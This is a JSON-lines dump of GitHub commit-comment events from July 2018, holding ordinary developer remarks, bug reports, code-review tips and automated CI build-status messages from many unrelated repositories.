{"id":"7973664756","type":"CommitCommentEvent","actor":{"login":"cgraywang"},"repo":{"name":"szha/mxnet"},"payload":{"comment":{"id":29728257,"position":63,"line":63,"path":"example/gluon/net_copier.py","commit_id":"ce8473ed1758e38ca06a606e5554f8e7efe6b5b4","created_at":"2018-07-17T00:29:04Z","updated_at":"2018-07-17T00:29:04Z","author_association":"NONE","body":"Nice!"}},"created_at":"2018-07-17T00:29:04Z"}
{"id":"7973665620","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29728263,"position":null,"line":null,"path":null,"commit_id":"6cd4ca134e1ec08c138c5257d4b0b3a30c2dde22","created_at":"2018-07-17T00:29:24Z","updated_at":"2018-07-17T00:29:24Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-72](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-72).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-72-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T00:29:24Z"}
{"id":"7973671980","type":"CommitCommentEvent","actor":{"login":"espritka"},"repo":{"name":"espritka/project-memory"},"payload":{"comment":{"id":29728278,"position":null,"line":null,"path":null,"commit_id":"0b549d1ea5dccc19e51708726e3247f3b0932139","created_at":"2018-07-17T00:31:56Z","updated_at":"2018-07-17T00:31:56Z","author_association":"OWNER","body":"If clicked quickly multiple times on the same card, it does not toggle correctly. I'm working on a different approach, I will try to check if element.toggleAttribute() will work. "}},"created_at":"2018-07-17T00:31:56Z"}
{"id":"7973676447","type":"CommitCommentEvent","actor":{"login":"stooperpig"},"repo":{"name":"LoSer31/Hondo"},"payload":{"comment":{"id":29728290,"position":null,"line":null,"path":null,"commit_id":"deb0454b35b551237cc92f51dab67f0617759bfd","created_at":"2018-07-17T00:33:46Z","updated_at":"2018-07-17T00:33:46Z","author_association":"COLLABORATOR","body":"Cool.   Quick note.    The name attribute for a select goes on the select tag itself.   Not on it's child option tags.\r\n\r\nhttps://www.w3schools.com/tags/tag_option.asp  <- look at the section that shows the Attributes.  Note there isn't an name attribute for the option tag.    You can always look at the HTML reference on w3schools to find out what are the default attributes for any tag.\r\n\r\n<select name=\"billStuff\">\r\n  <option value=\"hondo\">Greatest dog on the planet</option>\r\n <option value=\"monkey\">Bill's favorite value</option>\r\n</select>"}},"created_at":"2018-07-17T00:33:46Z"}
{"id":"7973676683","type":"CommitCommentEvent","actor":{"login":"rprimus"},"repo":{"name":"joaotavora/sly"},"payload":{"comment":{"id":29728291,"position":null,"line":null,"path":null,"commit_id":"cc0656cf705cbb493f255bc401f4d6aa32199422","created_at":"2018-07-17T00:33:52Z","updated_at":"2018-07-17T00:33:52Z","author_association":"CONTRIBUTOR","body":"Tue Jul 17 01:30:44 BST 2018\r\n\r\nAll good now.\r\n\r\nNow need to find out the subtle differences between `kbd \"RET\"` and `[return]`."}},"created_at":"2018-07-17T00:33:52Z"}
{"id":"7973678807","type":"CommitCommentEvent","actor":{"login":"rgmmach"},"repo":{"name":"jotta/jotta-cli-issues"},"payload":{"comment":{"id":29728296,"position":5,"line":5,"path":".github/ISSUE_TEMPLATE.md","commit_id":"5f3e365a1b5283a842af428e0f15c77dda28f1bf","created_at":"2018-07-17T00:34:42Z","updated_at":"2018-07-17T00:34:42Z","author_association":"NONE","body":"jotta-cli on windows 7 64bit. Tried to archive a directory with the following sequence of commands\r\n1) Start a command window\r\n2) Change to the drive where the files are (e:)\r\n3) change to the directory \"above\" the directory I wish to archive  (cd \\my_name\\Photos\\Family)\r\n4) Run the command to archive the folder 1996 (jotta-cli archive 1996)\r\n5) Error received (Error: [2] read E:\\my_name\\Photos\\Family\\1996: The handle is invalid.)\r\n6) Tried the same sequence with a Run as administrator cmd window - the same result"}},"created_at":"2018-07-17T00:34:42Z"}
{"id":"7973685228","type":"CommitCommentEvent","actor":{"login":"Talon1024"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29728316,"position":null,"line":null,"path":null,"commit_id":"d12a1ed05e9221f2bfa855c77e59b705376a93b1","created_at":"2018-07-17T00:37:29Z","updated_at":"2018-07-17T00:37:29Z","author_association":"CONTRIBUTOR","body":"Speaking of working examples, have you seen [these](https://github.com/SaschaWillems/Vulkan) yet?"}},"created_at":"2018-07-17T00:37:29Z"}
{"id":"7973685379","type":"CommitCommentEvent","actor":{"login":"rgmmach"},"repo":{"name":"jotta/jotta-cli-issues"},"payload":{"comment":{"id":29728318,"position":7,"line":7,"path":".github/ISSUE_TEMPLATE.md","commit_id":"5f3e365a1b5283a842af428e0f15c77dda28f1bf","created_at":"2018-07-17T00:37:32Z","updated_at":"2018-07-17T00:37:32Z","author_association":"NONE","body":"Folder and folder contents to upload to my archive"}},"created_at":"2018-07-17T00:37:32Z"}
{"id":"7973686039","type":"CommitCommentEvent","actor":{"login":"rgmmach"},"repo":{"name":"jotta/jotta-cli-issues"},"payload":{"comment":{"id":29728321,"position":10,"line":10,"path":".github/ISSUE_TEMPLATE.md","commit_id":"5f3e365a1b5283a842af428e0f15c77dda28f1bf","created_at":"2018-07-17T00:37:49Z","updated_at":"2018-07-17T00:37:49Z","author_association":"NONE","body":"Error: [2] read E:\\my_name\\Photos\\Family\\1996: The handle is invalid."}},"created_at":"2018-07-17T00:37:49Z"}
{"id":"7973689182","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29728339,"position":null,"line":null,"path":null,"commit_id":"3286e13160cef508b261eadf7becfc98a3c814da","created_at":"2018-07-17T00:39:13Z","updated_at":"2018-07-17T00:39:13Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2010/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 20545 seconds\n\nTests produced 2728 warnings. 2728 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-17T00:39:13Z"}
{"id":"7973689669","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29728341,"position":null,"line":null,"path":null,"commit_id":"83d268222792aa4edb87d01eb2bce7152764c321","created_at":"2018-07-17T00:39:26Z","updated_at":"2018-07-17T00:39:26Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 542](https://ci.hashicorp.engineering/viewLog.html?buildId=104484&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-17T00:39:26Z"}
{"id":"7973691735","type":"CommitCommentEvent","actor":{"login":"TysonAndre"},"repo":{"name":"phan/phan"},"payload":{"comment":{"id":29728349,"position":4,"line":5080,"path":"src/Phan/Language/Internal/FunctionSignatureMap.php","commit_id":"c15d23f69eb295db4159eec2c520f11568f066ad","created_at":"2018-07-17T00:40:16Z","updated_at":"2018-07-17T00:40:16Z","author_association":"COLLABORATOR","body":"The param type checker has problems with alternate signatures right now.\r\n\r\nIt will iterate over the Generator of `FunctionInterface` instances and select the first instance that has a viable parameter count, without checking the types first (It works if there's no alternates).\r\n\r\nI can't really say more without knowing the specific use.\r\n\r\nYou might want to look at \\Phan\\PluginV2\\StopParamAnalysisException and create a plugin specific to implode() to fix the error."}},"created_at":"2018-07-17T00:40:16Z"}
{"id":"7973695141","type":"CommitCommentEvent","actor":{"login":"TysonAndre"},"repo":{"name":"phan/phan"},"payload":{"comment":{"id":29728360,"position":4,"line":5080,"path":"src/Phan/Language/Internal/FunctionSignatureMap.php","commit_id":"c15d23f69eb295db4159eec2c520f11568f066ad","created_at":"2018-07-17T00:41:43Z","updated_at":"2018-07-17T00:41:43Z","author_association":"COLLABORATOR","body":"src/Phan/Plugin/Internal/MiscParamPlugin.php already has that, but doesn't use StopParamAnalysisException yet, and wasn't made specific enough."}},"created_at":"2018-07-17T00:41:43Z"}
{"id":"7973698382","type":"CommitCommentEvent","actor":{"login":"lolita-is-godddd"},"repo":{"name":"jaoafa/MyMaid2"},"payload":{"comment":{"id":29728381,"position":34,"line":62,"path":"src/main/java/com/jaoafa/MyMaid2/Event/Event_AntiNetherPortal.java","commit_id":"b9493f944fecc0be6fc0ddf82c02120336248f94","created_at":"2018-07-17T00:43:00Z","updated_at":"2018-07-17T00:43:00Z","author_association":"NONE","body":"ポータルだけどうぃざーになってる"}},"created_at":"2018-07-17T00:43:00Z"}
{"id":"7973701264","type":"CommitCommentEvent","actor":{"login":"lemonpledge97"},"repo":{"name":"lemonpledge97/hello-world"},"payload":{"comment":{"id":29728394,"position":5,"line":5,"path":"README.md","commit_id":"25b6f700aec634ce1767d29c9e4fd283679ab351","created_at":"2018-07-17T00:44:09Z","updated_at":"2018-07-17T00:44:09Z","author_association":"OWNER","body":"This the one. Keep THIS one."}},"created_at":"2018-07-17T00:44:09Z"}
{"id":"7973701452","type":"CommitCommentEvent","actor":{"login":"TangledTessellations"},"repo":{"name":"TangledTessellations/front-end-project-week"},"payload":{"comment":{"id":29728396,"position":null,"line":null,"path":null,"commit_id":"81cd6dba141114c175a99d958b6ddac4f385bbb8","created_at":"2018-07-17T00:44:13Z","updated_at":"2018-07-17T00:44:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Edit an existing note](https://trello.com/c/STDXKnjH/11-edit-an-existing-note)"}},"created_at":"2018-07-17T00:44:13Z"}
{"id":"7973702198","type":"CommitCommentEvent","actor":{"login":"BrOgBr"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29728398,"position":null,"line":null,"path":null,"commit_id":"a5588dd9ab00d33e9e09c8cc4b34a83710dcc3c6","created_at":"2018-07-17T00:44:32Z","updated_at":"2018-07-17T00:44:32Z","author_association":"CONTRIBUTOR","body":"Thank you very much for this release @Lemongrass3110 and the others.\r\nThis new features gives a new life to the our RO. ;)"}},"created_at":"2018-07-17T00:44:32Z"}
{"id":"7973704136","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29728412,"position":null,"line":null,"path":null,"commit_id":"1f061b43f649e115558060b1aaf58acdd5783806","created_at":"2018-07-17T00:45:16Z","updated_at":"2018-07-17T00:45:16Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2985 of 2985 tests passed, 627 test warnings)\n\nMessages:\n\n * 627 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T00:45:16Z"}
{"id":"7973706959","type":"CommitCommentEvent","actor":{"login":"Meta-Sean"},"repo":{"name":"Meta-Sean/Project-1"},"payload":{"comment":{"id":29728417,"position":null,"line":null,"path":null,"commit_id":"45b78d3883e18a1739810451c03c3e6df87d36cf","created_at":"2018-07-17T00:46:21Z","updated_at":"2018-07-17T00:46:21Z","author_association":"OWNER","body":"Good Job"}},"created_at":"2018-07-17T00:46:21Z"}
{"id":"7973711989","type":"CommitCommentEvent","actor":{"login":"espritka"},"repo":{"name":"espritka/project-memory"},"payload":{"comment":{"id":29728427,"position":null,"line":null,"path":null,"commit_id":"a9dc2d2ca8233e4f47180e133ce9fb189d1b57b9","created_at":"2018-07-17T00:48:20Z","updated_at":"2018-07-17T00:48:20Z","author_association":"OWNER","body":"element.toggleAttribute() didn't work, so I created an outside function instead. I have noticed, that it started to work, but works only when I click on black/blue background (<li>), but stop working, when I click on a symbol. "}},"created_at":"2018-07-17T00:48:20Z"}
{"id":"7973712491","type":"CommitCommentEvent","actor":{"login":"aspedrosa"},"repo":{"name":"aspedrosa/expensesManager"},"payload":{"comment":{"id":29728428,"position":null,"line":null,"path":null,"commit_id":"722d80400b7678421e72a6b5b2374b6965abdb8c","created_at":"2018-07-17T00:48:33Z","updated_at":"2018-07-17T00:48:33Z","author_association":"OWNER","body":"What was done in this commit (need to start to put this in the commit message):\r\n- Just changes to MainForm\r\n  - Organize controls display;\r\n  - Created a list in for incomes;\r\n  - Put control on group boxes instead of using labels;\r\n  - Optimized resize of the height of calendar rows to happen only when is necessary;\r\n  - Defined a minimum height for rows mentioned above."}},"created_at":"2018-07-17T00:48:33Z"}
{"id":"7973712763","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29728429,"position":null,"line":null,"path":null,"commit_id":"83d268222792aa4edb87d01eb2bce7152764c321","created_at":"2018-07-17T00:48:39Z","updated_at":"2018-07-17T00:48:39Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 542](https://ci.hashicorp.engineering/viewLog.html?buildId=104484&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:09:13"}},"created_at":"2018-07-17T00:48:39Z"}
{"id":"7973714481","type":"CommitCommentEvent","actor":{"login":"cosmi25"},"repo":{"name":"Meta-Sean/Project-1"},"payload":{"comment":{"id":29728434,"position":null,"line":null,"path":null,"commit_id":"45b78d3883e18a1739810451c03c3e6df87d36cf","created_at":"2018-07-17T00:49:22Z","updated_at":"2018-07-17T00:49:22Z","author_association":"COLLABORATOR","body":"yes yes"}},"created_at":"2018-07-17T00:49:22Z"}
{"id":"7973716332","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29728439,"position":null,"line":null,"path":null,"commit_id":"82d84365d9e79f360037ebf1dcfc5d8756436d8b","created_at":"2018-07-17T00:50:12Z","updated_at":"2018-07-17T00:50:12Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-17T00:50:12Z"}
{"id":"7973716362","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29728440,"position":null,"line":null,"path":null,"commit_id":"f7a458b84542dbb2806edeb204827ab2bcee50fd","created_at":"2018-07-17T00:50:12Z","updated_at":"2018-07-17T00:50:12Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-17T00:50:12Z"}
{"id":"7973716501","type":"CommitCommentEvent","actor":{"login":"malbit"},"repo":{"name":"arqma/arqma"},"payload":{"comment":{"id":29728441,"position":null,"line":null,"path":null,"commit_id":"01b5924dd051b1fc3addc553acd4002257e32b84","created_at":"2018-07-17T00:50:15Z","updated_at":"2018-07-17T00:50:15Z","author_association":"MEMBER","body":"./b2 --build-type=minimal link=shared runtime-link=shared --with-atomic --with-chrono --with-container --with-context --with-contract --with-coroutine --with-date_time --with-exception --with-fiber --with-filesystem --with-graph --with-graph_parallel --with-iostreams --with-locale --with-log --with-math --with-mpi --with-program_options --with-python --with-random --with-regex --with-serialization --with-signals --with-stacktrace --with-system --with-test --with-thread --with-timer --with-type_erasure --with-wave threading=multi threadapi=pthread cflags=\"-fPIC\" cxxflags=\"-fPIC\" define=BOOST_LOG_WITHOUT_SYSLOG stage <<<---instead I didnt add all libs last night :("}},"created_at":"2018-07-17T00:50:15Z"}
{"id":"7973717230","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29728442,"position":null,"line":null,"path":null,"commit_id":"1f061b43f649e115558060b1aaf58acdd5783806","created_at":"2018-07-17T00:50:32Z","updated_at":"2018-07-17T00:50:32Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-17T00:50:32Z"}
{"id":"7973717291","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29728443,"position":null,"line":null,"path":null,"commit_id":"8a8e66743d9916b1e5abd7f28f53cec78de96b3a","created_at":"2018-07-17T00:50:33Z","updated_at":"2018-07-17T00:50:33Z","author_association":"COLLABORATOR","body":"- something something revert\r\n\r\n## New string\r\n- `VIEW_SURROUNDING_MESSAGES: \"View surrounding messages.\"`"}},"created_at":"2018-07-17T00:50:33Z"}
{"id":"7973722975","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":29728458,"position":null,"line":null,"path":null,"commit_id":"bc67565e37f866955cf31188049755323a395dd1","created_at":"2018-07-17T00:52:52Z","updated_at":"2018-07-17T00:52:52Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-17T00:52:52Z"}
{"id":"7973725199","type":"CommitCommentEvent","actor":{"login":"thomas-miceli"},"repo":{"name":"thomas-miceli/cvgest"},"payload":{"comment":{"id":29728469,"position":null,"line":null,"path":null,"commit_id":"e3306e76079e6cb702ba2fe691c4680f2477fd36","created_at":"2018-07-17T00:53:47Z","updated_at":"2018-07-17T00:53:47Z","author_association":"OWNER","body":"help 😾"}},"created_at":"2018-07-17T00:53:47Z"}
{"id":"7973735195","type":"CommitCommentEvent","actor":{"login":"GutierrezDev"},"repo":{"name":"slashmax/AAMirror"},"payload":{"comment":{"id":29728487,"position":null,"line":null,"path":null,"commit_id":"d76f6d97fcb41ddff4197dc5744d4a9b3e5622f3","created_at":"2018-07-17T00:57:26Z","updated_at":"2018-07-17T00:57:26Z","author_association":"NONE","body":"This one works. Thanks for your hard work."}},"created_at":"2018-07-17T00:57:26Z"}
{"id":"7973744604","type":"CommitCommentEvent","actor":{"login":"yeanlieng"},"repo":{"name":"yeanlieng/Openholo"},"payload":{"comment":{"id":29728523,"position":null,"line":null,"path":null,"commit_id":"52865cf58c0e6da8c562e23d4f2d235a1a0d5e2b","created_at":"2018-07-17T01:01:02Z","updated_at":"2018-07-17T01:01:02Z","author_association":"OWNER","body":"using PYL, xml"}},"created_at":"2018-07-17T01:01:02Z"}
{"id":"7973744645","type":"CommitCommentEvent","actor":{"login":"hashil79"},"repo":{"name":"Apress/pointers-in-c"},"payload":{"comment":{"id":29728524,"position":null,"line":null,"path":null,"commit_id":"d4cde24c094fa61177367cc809ac4f1b77a46f28","created_at":"2018-07-17T01:01:03Z","updated_at":"2018-07-17T01:01:03Z","author_association":"NONE","body":"To much typo error on multi dimension array. And so far many many errors guys please set download and work this book again. "}},"created_at":"2018-07-17T01:01:03Z"}
{"id":"7973744972","type":"CommitCommentEvent","actor":{"login":"ben-manes"},"repo":{"name":"subes/invesdwin-util"},"payload":{"comment":{"id":29728525,"position":129,"line":129,"path":"invesdwin-util/src/main/java/de/invesdwin/util/collections/loadingcache/caffeine/CaffeineLoadingCacheMapConfig.java","commit_id":"984134bb666d45662874b9ee55dc237635c159c3","created_at":"2018-07-17T01:01:11Z","updated_at":"2018-07-17T01:01:11Z","author_association":"NONE","body":"fyi, you can pass a duration in directly 😄 "}},"created_at":"2018-07-17T01:01:11Z"}
{"id":"7973745711","type":"CommitCommentEvent","actor":{"login":"Nekoy1"},"repo":{"name":"Nekoy1/Cindy"},"payload":{"comment":{"id":29728527,"position":null,"line":null,"path":null,"commit_id":"6be840e9739d298bf8aacd10fa9e0b75f1e3d2a8","created_at":"2018-07-17T01:01:27Z","updated_at":"2018-07-17T01:01:27Z","author_association":"OWNER","body":"<body>\r\n\r\n<h1> nunca </h1>\r\n</body>"}},"created_at":"2018-07-17T01:01:27Z"}
{"id":"7973746967","type":"CommitCommentEvent","actor":{"login":"ibnujakaria"},"repo":{"name":"ibnujakaria/deteksi-penyakit-jagung"},"payload":{"comment":{"id":29728531,"position":null,"line":null,"path":null,"commit_id":"912e853a04cc1d163fded0825d6bceecc29c5bff","created_at":"2018-07-17T01:01:53Z","updated_at":"2018-07-17T01:01:53Z","author_association":"OWNER","body":"Sorry, ini maksudnya ekstraksi fitur untuk data training. Bukan training data untuk klasifikasi :smile: "}},"created_at":"2018-07-17T01:01:53Z"}
{"id":"7973748166","type":"CommitCommentEvent","actor":{"login":"Nekoy1"},"repo":{"name":"Nekoy1/Cindy"},"payload":{"comment":{"id":29728533,"position":1,"line":1,"path":"h.txt","commit_id":"6be840e9739d298bf8aacd10fa9e0b75f1e3d2a8","created_at":"2018-07-17T01:02:21Z","updated_at":"2018-07-17T01:02:21Z","author_association":"OWNER","body":"<body>\r\n<h2> por favor corregir </h2>\r\n</body>\r\n"}},"created_at":"2018-07-17T01:02:21Z"}
{"id":"7973748837","type":"CommitCommentEvent","actor":{"login":"omnicons"},"repo":{"name":"TitanEmbeds/ansible-playbooks"},"payload":{"comment":{"id":29728539,"position":null,"line":null,"path":null,"commit_id":"c7c09bc11fa162206d38560732cad12f3e9a3f0d","created_at":"2018-07-17T01:02:38Z","updated_at":"2018-07-17T01:02:38Z","author_association":"MEMBER","body":"Protip, don't add a license to a repository that doesn't belong to you <3"}},"created_at":"2018-07-17T01:02:38Z"}
{"id":"7973750170","type":"CommitCommentEvent","actor":{"login":"yeanlieng"},"repo":{"name":"yeanlieng/Openholo"},"payload":{"comment":{"id":29728541,"position":null,"line":null,"path":null,"commit_id":"da328b5d34cda2b7d70b4683e5ae4dc47b1e255c","created_at":"2018-07-17T01:03:10Z","updated_at":"2018-07-17T01:03:10Z","author_association":"OWNER","body":"header WRP version 2.0"}},"created_at":"2018-07-17T01:03:10Z"}
{"id":"7973751246","type":"CommitCommentEvent","actor":{"login":"SirCmpwn"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29728543,"position":null,"line":null,"path":null,"commit_id":"db3a36373435a34b8d0a5fc4e90eacaa2b1dae6b","created_at":"2018-07-17T01:03:36Z","updated_at":"2018-07-17T01:03:36Z","author_association":"MEMBER","body":"I don't have time to debug it in depth right now but this commit broke my includes, @ianyfan. My config is here:\r\n\r\nhttps://git.sr.ht/~sircmpwn/dotfiles/tree/.config/sway/config#n181\r\n\r\nMy output config in `~/.config/sway/config.d/:hostname/outputs` doesn't get loaded."}},"created_at":"2018-07-17T01:03:36Z"}
{"id":"7973762679","type":"CommitCommentEvent","actor":{"login":"lorenarey"},"repo":{"name":"Geraldine13/lim-2018-05-bc-core-am-socialnetwork"},"payload":{"comment":{"id":29728571,"position":null,"line":null,"path":null,"commit_id":"0dcbf3a460a11d10f9812d9139ae31ecc882f3b6","created_at":"2018-07-17T01:08:23Z","updated_at":"2018-07-17T01:08:23Z","author_association":"NONE","body":"Geral por favor subelo al master "}},"created_at":"2018-07-17T01:08:23Z"}
{"id":"7973768436","type":"CommitCommentEvent","actor":{"login":"rgmmach"},"repo":{"name":"jotta/jotta-cli-issues"},"payload":{"comment":{"id":29728590,"position":25,"line":25,"path":".github/ISSUE_TEMPLATE.md","commit_id":"5f3e365a1b5283a842af428e0f15c77dda28f1bf","created_at":"2018-07-17T01:10:47Z","updated_at":"2018-07-17T01:10:47Z","author_association":"NONE","body":"I should have mentioned I did login prior to attempting to archive the folder (jotta-cli login)."}},"created_at":"2018-07-17T01:10:47Z"}
{"id":"7973775232","type":"CommitCommentEvent","actor":{"login":"karbila"},"repo":{"name":"karbila/sikeairan"},"payload":{"comment":{"id":29728601,"position":4,"line":4,"path":"README.md","commit_id":"bc7fe64647152516cb8dd618ad01df98e2aca40b","created_at":"2018-07-17T01:13:33Z","updated_at":"2018-07-17T01:13:33Z","author_association":"OWNER","body":"ini abie"}},"created_at":"2018-07-17T01:13:33Z"}
{"id":"7973782332","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29728613,"position":5,"line":109,"path":"mipsHex/asm_type/mips_asm_arithmetic.py","commit_id":"0c7a29212a1d106510b65fb3010fade7f700c490","created_at":"2018-07-17T01:16:31Z","updated_at":"2018-07-17T01:16:31Z","author_association":"OWNER","body":"Can i add decorator pattern in Operand()?\r\ne.g) if cvt_type == ASM_TYPE['Base_Ifx_Disp']: \r\n                cvt_value = self.opr3.value + '(' + o_reg.get_register(self.opr2.value) + ')'"}},"created_at":"2018-07-17T01:16:31Z"}
{"id":"7973783870","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29728617,"position":5,"line":109,"path":"mipsHex/asm_type/mips_asm_arithmetic.py","commit_id":"0c7a29212a1d106510b65fb3010fade7f700c490","created_at":"2018-07-17T01:17:10Z","updated_at":"2018-07-17T01:17:10Z","author_association":"OWNER","body":"Operand method overloading : http://abipictures.tistory.com/713"}},"created_at":"2018-07-17T01:17:10Z"}
{"id":"7973786950","type":"CommitCommentEvent","actor":{"login":"jenn-sung"},"repo":{"name":"Actualize-Apprenticeship-Team-Dan/gitrdun"},"payload":{"comment":{"id":29728622,"position":null,"line":null,"path":null,"commit_id":"309b7d09223aa0ee0652baff2c889f9a03c38f7d","created_at":"2018-07-17T01:18:28Z","updated_at":"2018-07-17T01:18:28Z","author_association":"CONTRIBUTOR","body":"+1 :cake:"}},"created_at":"2018-07-17T01:18:28Z"}
{"id":"7973792000","type":"CommitCommentEvent","actor":{"login":"blingyuan"},"repo":{"name":"blingyuan/permission"},"payload":{"comment":{"id":29728629,"position":null,"line":null,"path":null,"commit_id":"a7de2db24860609e613abc62606d6dc9d31bcaaf","created_at":"2018-07-17T01:20:31Z","updated_at":"2018-07-17T01:20:31Z","author_association":"OWNER","body":"企业权限控制"}},"created_at":"2018-07-17T01:20:31Z"}
{"id":"7973814154","type":"CommitCommentEvent","actor":{"login":"jiangwenyang"},"repo":{"name":"DIYgod/RSSHub"},"payload":{"comment":{"id":29728668,"position":null,"line":null,"path":null,"commit_id":"37d230205bcc5d8376457135a753fa3552ef4727","created_at":"2018-07-17T01:29:26Z","updated_at":"2018-07-17T01:29:26Z","author_association":"NONE","body":"1024"}},"created_at":"2018-07-17T01:29:26Z"}
{"id":"7973816199","type":"CommitCommentEvent","actor":{"login":"CaptainGlac1er"},"repo":{"name":"PHPMailer/PHPMailer"},"payload":{"comment":{"id":29728674,"position":43,"line":1079,"path":"src/SMTP.php","commit_id":"f4d37028af4b2f596847534566344b21d9b48b0d","created_at":"2018-07-17T01:30:13Z","updated_at":"2018-07-17T01:30:13Z","author_association":"NONE","body":"It is currently set to 100k+ so that is not the issue."}},"created_at":"2018-07-17T01:30:13Z"}
{"id":"7973820779","type":"CommitCommentEvent","actor":{"login":"admblack97"},"repo":{"name":"admblack97/web2"},"payload":{"comment":{"id":29728686,"position":null,"line":null,"path":null,"commit_id":"1c041945f5f2ec3e1737efb813573bd95bded59b","created_at":"2018-07-17T01:31:59Z","updated_at":"2018-07-17T01:31:59Z","author_association":"OWNER","body":"commit pertama"}},"created_at":"2018-07-17T01:31:59Z"}
{"id":"7973821775","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29728688,"position":null,"line":null,"path":null,"commit_id":"05dadeaf381dba17369e77c1259ce81c8a83cde0","created_at":"2018-07-17T01:32:22Z","updated_at":"2018-07-17T01:32:22Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nobject has no property head\n\n</details>"}},"created_at":"2018-07-17T01:32:22Z"}
